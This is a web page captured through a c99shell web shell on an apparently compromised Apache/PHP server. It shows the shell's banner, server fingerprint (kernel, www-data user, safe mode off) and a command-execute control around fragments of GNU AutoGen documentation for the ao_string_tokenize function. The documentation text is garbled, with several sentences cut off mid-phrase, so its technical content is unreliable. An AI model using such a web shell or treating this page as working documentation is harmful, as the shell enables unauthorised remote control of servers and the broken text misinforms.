Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/autogen/autogen.html/ drwxr-xr-x | |
| Viewing file: Select action/file-type: Next: libopts-configFileLoad, Up: libopts procedures [Contents][Index] 7.6.32.1 ao_string_tokenizetokenize an input string Usage: token_list_t * res = ao_string_tokenize( string ); Where the arguments are:
This function will convert one input string into a list of strings. The list of strings is derived by separating the input based on white space separation. However, if the input contains either single or double quote characters, then the text after that character up to a matching quote will become the string in the list. The returned pointer should be deallocated with The structure pointed to will contain at least these two fields:
There are two types of quoted strings: single quoted (
Double quote strings are formed according to the rules of string constants in ANSI-C programs. NULL is returned and
Next: libopts-configFileLoad, Up: libopts procedures [Contents][Index] |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]-- |